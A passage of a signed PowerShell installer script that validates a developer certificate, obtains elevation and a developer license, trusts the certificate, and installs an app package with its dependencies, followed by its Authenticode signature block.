(Get-PfxCertificate $CertificatePath).Extensions $HasBasicConstraints = $false $HasCodeSigningEku = $false foreach ($Extension in $CertificateExtensions) { # Certificate must contain the Basic Constraints extension if ($Extension.oid.value -eq $BasicConstraintsExtensionOid) { # CA property must be false if ($Extension.CertificateAuthority) { PrintMessageAndExit $UiStrings.ErrorCertIsCA $ErrorCodes.CertIsCA } $HasBasicConstraints = $true } # If key usage is present, it must be set to digital signature elseif ($Extension.oid.value -eq $KeyUsageExtensionOid) { if ($Extension.KeyUsages -ne "DigitalSignature") { PrintMessageAndExit ($UiStrings.ErrorBannedKeyUsage -f $Extension.KeyUsages) $ErrorCodes.BannedKeyUsage } } elseif ($Extension.oid.value -eq $EkuExtensionOid) { # Certificate must contain the Code Signing EKU $EKUs = $Extension.EnhancedKeyUsages.Value if ($EKUs -contains $CodeSigningEkuOid) { $HasCodeSigningEKU = $True } # EKUs other than code signing and lifetime signing are not allowed foreach ($EKU in $EKUs) { if ($EKU -ne $CodeSigningEkuOid -and $EKU -ne $LifetimeSigningEkuOid -and $EKU -ne $UwpSigningEkuOid -and $EKU -ne $DisposableSigningEkuOid) { PrintMessageAndExit ($UiStrings.ErrorBannedEKU -f $EKU) $ErrorCodes.BannedEKU } } } } if (!$HasBasicConstraints) { PrintMessageAndExit $UiStrings.ErrorNoBasicConstraints $ErrorCodes.NoBasicConstraints } if (!$HasCodeSigningEKU) { PrintMessageAndExit $UiStrings.ErrorNoCodeSigningEku $ErrorCodes.NoCodeSigningEku } } # # Performs operations that require administrative privileges: # - Prompt the user to obtain a developer license # - Install the developer certificate (if -Force is not specified, also prompts the user to confirm) # function DoElevatedOperations { if ($GetDeveloperLicense) { Write-Host $UiStrings.GettingDeveloperLicense if ($Force) { PrintMessageAndExit $UiStrings.ErrorForceDeveloperLicense $ErrorCodes.ForceDeveloperLicense } try { Show-WindowsDeveloperLicenseRegistration } catch { $Error[0] # Dump details about the last error PrintMessageAndExit $UiStrings.ErrorGetDeveloperLicenseFailed $ErrorCodes.GetDeveloperLicenseFailed } } if ($CertificatePath) { Write-Host $UiStrings.InstallingCertificate # Make sure certificate format is valid and usage constraints are followed ValidateCertificateFormat $CertificatePath CheckCertificateRestrictions # If -Force is not specified, warn the user and get consent if ($Force -or (ConfirmCertificateInstall)) { # Add cert to store certutil.exe -addstore TrustedPeople $CertificatePath if ($LastExitCode -lt 0) { PrintMessageAndExit ($UiStrings.ErrorCertUtilInstallFailed -f $LastExitCode) $ErrorCodes.CertUtilInstallFailed } } else { PrintMessageAndExit $UiStrings.ErrorInstallCertificateCancelled $ErrorCodes.InstallCertificateCancelled } } } # # Checks whether the machine is missing a valid developer license. # function CheckIfNeedDeveloperLicense { $Result = $true try { $Result = (Get-WindowsDeveloperLicense | Where-Object { $_.IsValid } | Measure-Object).Count -eq 0 } catch {} return $Result } # # Launches an elevated process running the current script to perform tasks # that require administrative privileges. This function waits until the # elevated process terminates, and checks whether those tasks were successful. # function LaunchElevated { # Set up command line arguments to the elevated process $RelaunchArgs = '-ExecutionPolicy Unrestricted -file "' + $ScriptPath + '"' if ($Force) { $RelaunchArgs += ' -Force' } if ($NeedDeveloperLicense) { $RelaunchArgs += ' -GetDeveloperLicense' } if ($SkipLoggingTelemetry) { $RelaunchArgs += ' -SkipLoggingTelemetry' } if ($NeedInstallCertificate) { $RelaunchArgs += ' -CertificatePath "' + $DeveloperCertificatePath.FullName + '"' } # Launch the process and wait for it to finish try { $PowerShellExePath = (Get-Process -Id $PID).Path $AdminProcess = Start-Process $PowerShellExePath -Verb RunAs -ArgumentList $RelaunchArgs -PassThru } catch { $Error[0] # Dump details about the last error PrintMessageAndExit $UiStrings.ErrorLaunchAdminFailed $ErrorCodes.LaunchAdminFailed } while (!($AdminProcess.HasExited)) { Start-Sleep -Seconds 2 } # Check if all elevated operations were successful if ($NeedDeveloperLicense) { if (CheckIfNeedDeveloperLicense) { PrintMessageAndExit $UiStrings.ErrorGetDeveloperLicenseFailed $ErrorCodes.GetDeveloperLicenseFailed } else { Write-Host $UiStrings.AcquireLicenseSuccessful } } if ($NeedInstallCertificate) { $Signature = Get-AuthenticodeSignature $DeveloperPackagePath -Verbose if ($Signature.Status -ne "Valid") { PrintMessageAndExit ($UiStrings.ErrorInstallCertificateFailed -f $Signature.Status) $ErrorCodes.InstallCertificateFailed } else { Write-Host $UiStrings.InstallCertificateSuccessful } } } # # Finds all applicable dependency packages according to OS architecture, and # installs the developer package with its dependencies. The expected layout # of dependencies is: # # <current dir> # \Dependencies # <Architecture neutral dependencies>.appx\.msix # \x86 # <x86 dependencies>.appx\.msix # \x64 # <x64 dependencies>.appx\.msix # \arm # <arm dependencies>.appx\.msix # \arm64 # <arm64 dependencies>.appx\.msix # function InstallPackageWithDependencies { $DependencyPackagesDir = (Join-Path $ScriptDir "Dependencies") $DependencyPackages = @() if (Test-Path $DependencyPackagesDir) { # Get architecture-neutral dependencies $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "*.appx") | Where-Object { $_.Mode -NotMatch "d" } $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "*.msix") | Where-Object { $_.Mode -NotMatch "d" } # Get architecture-specific dependencies if (($ProcessorArchitecture -eq "x86" -or $ProcessorArchitecture -eq "amd64" -or $ProcessorArchitecture -eq "arm64") -and (Test-Path (Join-Path $DependencyPackagesDir "x86"))) { $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "x86\*.appx") | Where-Object { $_.Mode -NotMatch "d" } $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "x86\*.msix") | Where-Object { $_.Mode -NotMatch "d" } } if ((($ProcessorArchitecture -eq "amd64") -or ($ProcessorArchitecture -eq "arm64" -and $Amd64AppsSupportedOnArm64)) -and (Test-Path (Join-Path $DependencyPackagesDir "x64"))) { $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "x64\*.appx") | Where-Object { $_.Mode -NotMatch "d" } $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "x64\*.msix") | Where-Object { $_.Mode -NotMatch "d" } } if (($ProcessorArchitecture -eq "arm" -or $ProcessorArchitecture -eq "arm64") -and (Test-Path (Join-Path $DependencyPackagesDir "arm"))) { $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "arm\*.appx") | Where-Object { $_.Mode -NotMatch "d" } $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "arm\*.msix") | Where-Object { $_.Mode -NotMatch "d" } } if (($ProcessorArchitecture -eq "arm64") -and (Test-Path (Join-Path $DependencyPackagesDir "arm64"))) { $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "arm64\*.appx") | Where-Object { $_.Mode -NotMatch "d" } $DependencyPackages += Get-ChildItem (Join-Path $DependencyPackagesDir "arm64\*.msix") | Where-Object { $_.Mode -NotMatch "d" } } } Write-Host $UiStrings.InstallingPackage $AddPackageSucceeded = $False try { if ($DependencyPackages.FullName.Count -gt 0) { Write-Host $UiStrings.DependenciesFound $DependencyPackages.FullName Add-AppxPackage -Path $DeveloperPackagePath.FullName -DependencyPath $DependencyPackages.FullName -ForceApplicationShutdown } else { Add-AppxPackage -Path $DeveloperPackagePath.FullName -ForceApplicationShutdown } $AddPackageSucceeded = $? } catch { $Error[0] # Dump details about the last error } if (!$AddPackageSucceeded) { if ($NeedInstallCertificate) { PrintMessageAndExit $UiStrings.ErrorAddPackageFailedWithCert $ErrorCodes.AddPackageFailed } else { PrintMessageAndExit $UiStrings.ErrorAddPackageFailed $ErrorCodes.AddPackageFailed } } } # # Main script logic when the user launches the script without parameters. # function DoStandardOperations { # Check for an .appx or .msix file in the script directory $PackagePath = Get-ChildItem (Join-Path $ScriptDir "*.appx") | Where-Object { $_.Mode -NotMatch "d" } if ($PackagePath -eq $null) { $PackagePath = Get-ChildItem (Join-Path $ScriptDir "*.msix") | Where-Object { $_.Mode -NotMatch "d" } } $PackageCount = ($PackagePath | Measure-Object).Count # Check for an .appxbundle or .msixbundle file in the script directory $BundlePath = Get-ChildItem (Join-Path $ScriptDir "*.appxbundle") | Where-Object { $_.Mode -NotMatch "d" } if ($BundlePath -eq $null) { $BundlePath = Get-ChildItem (Join-Path $ScriptDir "*.msixbundle") | Where-Object { $_.Mode -NotMatch "d" } } $BundleCount = ($BundlePath | Measure-Object).Count # Check for an .eappx or .emsix file in the script directory $EncryptedPackagePath = Get-ChildItem (Join-Path $ScriptDir "*.eappx") | Where-Object { $_.Mode -NotMatch "d" } if ($EncryptedPackagePath -eq $null) { $EncryptedPackagePath = Get-ChildItem (Join-Path $ScriptDir "*.emsix") | Where-Object { $_.Mode -NotMatch "d" } } $EncryptedPackageCount = ($EncryptedPackagePath | Measure-Object).Count # Check for an .eappxbundle or .emsixbundle file in the script directory $EncryptedBundlePath = Get-ChildItem (Join-Path $ScriptDir "*.eappxbundle") | Where-Object { $_.Mode -NotMatch "d" } if ($EncryptedBundlePath -eq $null) { $EncryptedBundlePath = Get-ChildItem (Join-Path $ScriptDir "*.emsixbundle") | Where-Object { $_.Mode -NotMatch "d" } } $EncryptedBundleCount = ($EncryptedBundlePath | Measure-Object).Count $NumberOfPackages = $PackageCount + $EncryptedPackageCount $NumberOfBundles = $BundleCount + $EncryptedBundleCount # There must be at least one package or bundle if ($NumberOfPackages + $NumberOfBundles -lt 1) { PrintMessageAndExit $UiStrings.ErrorNoPackageFound $ErrorCodes.NoPackageFound } # We must have exactly one bundle OR no bundle and exactly one package elseif ($NumberOfBundles -gt 1 -or ($NumberOfBundles -eq 0 -and $NumberOfpackages -gt 1)) { PrintMessageAndExit $UiStrings.ErrorManyPackagesFound $ErrorCodes.ManyPackagesFound } # First attempt to install a bundle or encrypted bundle. If neither exists, fall back to packages and then encrypted packages if ($BundleCount -eq 1) { $DeveloperPackagePath = $BundlePath Write-Host ($UiStrings.BundleFound -f $DeveloperPackagePath.FullName) } elseif ($EncryptedBundleCount -eq 1) { $DeveloperPackagePath = $EncryptedBundlePath Write-Host ($UiStrings.EncryptedBundleFound -f $DeveloperPackagePath.FullName) } elseif ($PackageCount -eq 1) { $DeveloperPackagePath = $PackagePath Write-Host ($UiStrings.PackageFound -f $DeveloperPackagePath.FullName) } elseif ($EncryptedPackageCount -eq 1) { $DeveloperPackagePath = $EncryptedPackagePath Write-Host ($UiStrings.EncryptedPackageFound -f $DeveloperPackagePath.FullName) } # The package must be signed $PackageSignature = Get-AuthenticodeSignature $DeveloperPackagePath $PackageCertificate = $PackageSignature.SignerCertificate if (!$PackageCertificate) { PrintMessageAndExit $UiStrings.ErrorPackageUnsigned $ErrorCodes.PackageUnsigned } # Test if the package signature is trusted. If not, the corresponding certificate # needs to be present in the current directory and needs to be installed. $NeedInstallCertificate = ($PackageSignature.Status -ne "Valid") if ($NeedInstallCertificate) { # List all .cer files in the script directory $DeveloperCertificatePath = Get-ChildItem (Join-Path $ScriptDir "*.cer") | Where-Object { $_.Mode -NotMatch "d" } $DeveloperCertificateCount = ($DeveloperCertificatePath | Measure-Object).Count # There must be exactly 1 certificate if ($DeveloperCertificateCount -lt 1) { PrintMessageAndExit $UiStrings.ErrorNoCertificateFound $ErrorCodes.NoCertificateFound } elseif ($DeveloperCertificateCount -gt 1) { PrintMessageAndExit $UiStrings.ErrorManyCertificatesFound $ErrorCodes.ManyCertificatesFound } Write-Host ($UiStrings.CertificateFound -f $DeveloperCertificatePath.FullName) # The .cer file must have the format of a valid certificate ValidateCertificateFormat $DeveloperCertificatePath # The package signature must match the certificate file if ($PackageCertificate -ne (Get-PfxCertificate $DeveloperCertificatePath)) { PrintMessageAndExit $UiStrings.ErrorCertificateMismatch $ErrorCodes.CertificateMismatch } } $NeedDeveloperLicense = CheckIfNeedDeveloperLicense # Relaunch the script elevated with the necessary parameters if needed if ($NeedDeveloperLicense -or $NeedInstallCertificate) { Write-Host $UiStrings.ElevateActions if ($NeedDeveloperLicense) { Write-Host $UiStrings.ElevateActionDevLicense } if ($NeedInstallCertificate) { Write-Host $UiStrings.ElevateActionCertificate } $IsAlreadyElevated = ([Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -contains "S-1-5-32-544") if ($IsAlreadyElevated) { if ($Force -and $NeedDeveloperLicense) { PrintMessageAndExit $UiStrings.ErrorForceDeveloperLicense $ErrorCodes.ForceDeveloperLicense } if ($Force -and $NeedInstallCertificate) { Write-Warning $UiStrings.WarningInstallCert } } else { if ($Force) { PrintMessageAndExit $UiStrings.ErrorForceElevate $ErrorCodes.ForceElevate } else { Write-Host $UiStrings.ElevateActionsContinue Pause } } LaunchElevated } InstallPackageWithDependencies } # # Main script entry point # if ($GetDeveloperLicense -or $CertificatePath) { DoElevatedOperations } else { DoStandardOperations PrintMessageAndExit $UiStrings.Success $ErrorCodes.Success } # SIG # Begin signature block # MIIlsAYJKoZIhvcNAQcCoIIloTCCJZ0CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAYh/586NhEPWiO # +3D6/pj3+lXDRXkK9+wCdlGR7safL6CCC2cwggTvMIID16ADAgECAhMzAAAFV8+Q # 3cfRwIiMAAAAAAVXMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTAwHhcNMjMxMDE5MTk1MTEyWhcNMjQxMDE2MTk1MTEyWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCs0/kFGrFBPJjNzuVjixsArYe7PjsMayjyn3AS8PHH7QmCeCIh2iH6OGSizwdy # /HSU5bfZcxZn25YEyff6mBQplp064tc7cue5Win7lqQKjCq5eExLe7M9Ms42HJ48 # 2nviJZvVK1qNDe4Y7H58TDTSatOk0agN5GP9xQc6opv9NPHZMK3vPfbKP85w2nmm # T7wDkaDVLoMxmEmNnf2zYtUauyrx+zzLVE/dkFvaKuwxqYg5QVJNqvxqx7FoCCg1 # q5WdAyp4B0S01JxTFPqb9w185mOsIi0dk7uJ6JoOT2WOsJL1BUuV2MgmFp1Z2OIB # rwkdeB55wG8mF7az1dWGjk5NAgMBAAGjggFuMIIBajAfBgNVHSUEGDAWBgorBgEE # AYI3PQYBBggrBgEFBQcDAzAdBgNVHQ4EFgQUZUiwqCE+1UNl9kCzINVmNMKtebcw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwODY1KzUwMTU5NzAfBgNVHSMEGDAWgBTm/F97uyIAWORyTrX0 # IXQjMubvrDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5j # b20vcGtpL2NybC9wcm9kdWN0cy9NaWNDb2RTaWdQQ0FfMjAxMC0wNy0wNi5jcmww # WgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29m # dC5jb20vcGtpL2NlcnRzL01pY0NvZFNpZ1BDQV8yMDEwLTA3LTA2LmNydDAMBgNV # HRMBAf8EAjAAMA0GCSqGSIb3DQEBCwUAA4IBAQDKLsNC5lAhZ0LL2vbh5pbhYDM1 # htEg3+di/58fDvtTcT+oLwq+eRPuIleUaK37eaEeynCJA7WvdJK9FjvZBC4Fbkqh # Lu6lSqplUUeJzxn620qcful+phcUszQYDyAsh4fjdTzJtx2jGeiJcD193yIoIzjN # rllXCtGVMSjryy2jiU4pczp1WOjWrCL9fz0ZvR811YZAnhyP6zu1V8pdYqeA668h # KvdfZzVp60F8ZkqnucOpa1WKiQEYEwkG5vOQdxoOxZWc+MJ6cmcNgA+7SfJbb0XX # +hsKIzK7Tb/E9dELF88573stY+AuuApvZLAsG76aU/jvqlyreUWX5M3uW2ShMIIG # cDCCBFigAwIBAgIKYQxSTAAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMTAwNzA2MjA0MDE3 # WhcNMjUwNzA2MjA1MDE3WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDEw # MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Q5kUHlntcTj/QkATJ6U # rPdWaOpE2M/FWE+ppXZ8bUW60zmStKQe+fllguQX0o/9RJwI6GWTzixVhL99COMu # K6hBKxi3oktuSUxrFQfe0dLCiR5xlM21f0u0rwjYzIjWaxeUOpPOJj/s5v40mFfV # HV1J9rIqLtWFu1k/+JC0K4N0yiuzO0bj8EZJwRdmVMkcvR3EVWJXcvhnuSUgNN5d # pqWVXqsogM3Vsp7lA7Vj07IUyMHIiiYKWX8H7P8O7YASNUwSpr5SW/Wm2uCLC0h3 # 1oVH1RC5xuiq7otqLQVcYMa0KlucIxxfReMaFB5vN8sZM4BqiU2jamZjeJPVMM+V # HwIDAQABo4IB4zCCAd8wEAYJKwYBBAGCNxUBBAMCAQAwHQYDVR0OBBYEFOb8X3u7 # IgBY5HJOtfQhdCMy5u+sMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1Ud # DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjR # PZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0 # LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNy # bDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93d3cubWljcm9z # b2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3J0MIGd # BgNVHSAEgZUwgZIwgY8GCSsGAQQBgjcuAzCBgTA9BggrBgEFBQcCARYxaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL1BLSS9kb2NzL0NQUy9kZWZhdWx0Lmh0bTBABggr # BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBQAG8AbABpAGMAeQBfAFMAdABhAHQA # ZQBtAGUAbgB0AC4gHTANBgkqhkiG9w0BAQsFAAOCAgEAGnTvV08pe8QWhXi4UNMi # /AmdrIKX+DT/KiyXlRLl5L/Pv5PI4zSp24G43B4AvtI1b6/lf3mVd+UC1PHr2M1O # HhthosJaIxrwjKhiUUVnCOM/PB6T+DCFF8g5QKbXDrMhKeWloWmMIpPMdJjnoUdD # 8lOswA8waX/+0iUgbW9h098H1dlyACxphnY9UdumOUjJN2FtB91TGcun1mHCv+KD # qw/ga5uV1n0oUbCJSlGkmmzItx9KGg5pqdfcwX7RSXCqtq27ckdjF/qm1qKmhuyo # EESbY7ayaYkGx0aGehg/6MUdIdV7+QIjLcVBy78dTMgW77Gcf/wiS0mKbhXjpn92 # W9FTeZGFndXS2z1zNfM8rlSyUkdqwKoTldKOEdqZZ14yjPs3hdHcdYWch8ZaV4XC # v90Nj4ybLeu07s8n07VeafqkFgQBpyRnc89NT7beBVaXevfpUk30dwVPhcbYC/GO # 7UIJ0Q124yNWeCImNr7KsYxuqh3khdpHM2KPpMmRM19xHkCvmGXJIuhCISWKHC1g # 2TeJQYkqFg/XYTyUaGBS79ZHmaCAQO4VgXc+nOBTGBpQHTiVmx5mMxMnORd4hzbO # TsNfsvU9R1O24OXbC2E9KteSLM43Wj5AQjGkHxAIwlacvyRdUQKdannSF9PawZSO # B3slcUSrBmrm1MbfI5qWdcUxghmfMIIZmwIBATCBlTB+MQswCQYDVQQGEwJVUzET # MBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV # TWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT # aWduaW5nIFBDQSAyMDEwAhMzAAAFV8+Q3cfRwIiMAAAAAAVXMA0GCWCGSAFlAwQC # AQUAoIGuMBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisGAQQBgjcCAQsx # DjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3DQEJBDEiBCA/8sllbhmdgHazXDKfJje5 # ZPISyNOJfdmSfAvZZC8tJDBCBgorBgEEAYI3AgEMMTQwMqAUgBIATQBpAGMAcgBv # AHMAbwBmAHShGoAYaHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3DQEB # AQUABIIBABoeIsmpFKWj+/DHcj7a/ppHvpeKsn0Jb20gbWcbk1BJD4HdDsWMZdZv # JyJjJ4swk9l5qsqRgt+WFtqYMoNul3XnXo2zHpSsAeypDGTTtnvrsTtqR5YXRhfB # ZpESj2UIlW9ESxRpmJscJpEwTymVPf81VR+gXiFTCZ1cLuX6YU6A8RFJTS4YifFL # K+4ENafhVH8Rv1ImQIZt817ttK6lMJHA8TvXKHleAt/jfkrUuLZCIt7a8LRRG14h # urv+OD4yRSNTCFBDBEXni7sqBH7vIrfoVoXs1hbLXcV5JYO2CK3yHBDAZNE2163e # IcwCDObIHWcPa2p9u4USrZuCvPH6InehghcpMIIXJQYKKwYBBAGCNwMDATGCFxUw # ghcRBgkqhkiG9w0BBwKgghcCMIIW/gIBAzEPMA0GCWCGSAFlAwQCAQUAMIIBWQYL # KoZIhvcNAQkQAQSgggFIBIIBRDCCAUACAQEGCisGAQQBhFkKAwEwMTANBglghkgB # ZQMEAgEFAAQgf6H5HE1KKmmasEjpJd+4pr328u4rgtlnMDMQIe/XhvACBmW6obm4 # 5xgTMjAyNDAyMTYxNzIyNDAuMTA5WjAEgAIB9KCB2KSB1TCB0jELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IEly # ZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVT # Tjo4NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaCCEXgwggcnMIIFD6ADAgECAhMzAAAB3V1XHZXUraobAAEAAAHdMA0G # CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTIz # MTAxMjE5MDcwOVoXDTI1MDExMDE5MDcwOVowgdIxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w # ZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVzIFRTUyBFU046ODZERi00 # QkJDLTkzMzUxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCoTgOUROoud5x1ER+JZ3yi # 6fvSb4qbk7XLWoqwsTFEqz0suQlitg7a4kD/k+dh12zdoOwJLUNaUGW0wxhcyund # N72GDawj7iSvj0bD9hT1Q4wV8uZqy0RcyBxy2ogGqGxObxSbqMWdGVnSjArPGnI4 # R1Jn2mPu/fwke7jfgePsYyasL3aVP5qdJgKt3mq8h/gCpr+pZK0DfM4K3GwoB8LK # r76k+pRBamKYu7ip+zAGG0ni3tKTHWrVeRFujVZ1zGDk0Srhj38nwSnUobmpS6PP # JBu6mtpmwOZe+/l9OiQHrDJKMmK+P/QoAxYx1KXB0jg7o5RQSjItevM0XS3q3aVt # GwV/RA7sdswTDGhCvDcsWsAhLgKu/vu5LRQG5d4VCrbs2AtRVGblJdgaulNe0uAi # rKkd4rS0/ajXG9qQCeI6yA3ZZeU4KKnn+YKb/mHLwTPN+G1xTcMrXd7oww9uD/Q3 # fMX1Sb7po7AUEJCuU/6stx60CfLndZx0r7RVYuUmv7mxrmBKUvIBehg1jefym73h # ZHbKE1SD6PKZFoYz7NEO5wOfrgcUAeM5YxIys+VluwQOMKZhZtuH4QZkY1eDW6fp # +/HIAI7w0n05QOg2AXL9pMdSR9nSIWkZ0njl3j0+oTBdCJeffCzLtK8N+VYlFnAE # JFDVE8UZ6hhcc+cPmbrDAwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFG6i9baMj1Ha # Rcsh0gylo9COJcPxMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAuVNmyDS4FyB1m # zHKlbn/Y5FE/yvM8iwb7uYfCa6mEds/3mjtsqNTqHPUocr8W3vRmQ7u5JFM8Usid # SGZLGWcOhQ6usmTU9zxIwBJ0RKUQS/Evpm14PjuFS0tC0pm/FyGYi7GqmdHwxHL9 # x3gPv8v6ipwkFpF4IaWhDMBjEM0ZIRsHBnV69cxqUOx08b37ue8RcWV9TJCp1hRD # Serq3fuLXlIF49J4CDsf/5d1zCtx7fE9vs7xiTQBfuf+agZO569O/cyAmxV78bYn # TTeXqF3VvvawCJEvlBg9fQGXQa7benWfjnQKrgYg5GEOZFX1DCkt9ch0DhoJhcbg # js06Vh2pa6qXSJZbMvCjbI+VPbDjYlgHfTzZchBx20GQ5ovfwTZTmMk7dGHoS2w6 # L5mVDWs5O/TnfwPde5qgnU6qxMcARlD2zD/v73WFKmibKbqQZ1LYzn/++gwIVcvH # v3us0ffD5KZZpYjtm6y90N6w+vmQlXaxjPUZuoVAwQZL2IfmI5hnXEORwelk/UXn # PPqgx5m4S4V+GXWmq3efzl3i24Mdn+y+EEEI9yoKo6gzliJ1YTRNYGLU1ix3uPPN # nf5Oy7otCtYPBGayg+5mjq7CSyjypXoHHifRQqmNbA1ClIUWtBB1FvmZCi5aISq0 # uxcI3ayDVpDwYG0M5wo3RNpuO0I02zCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # 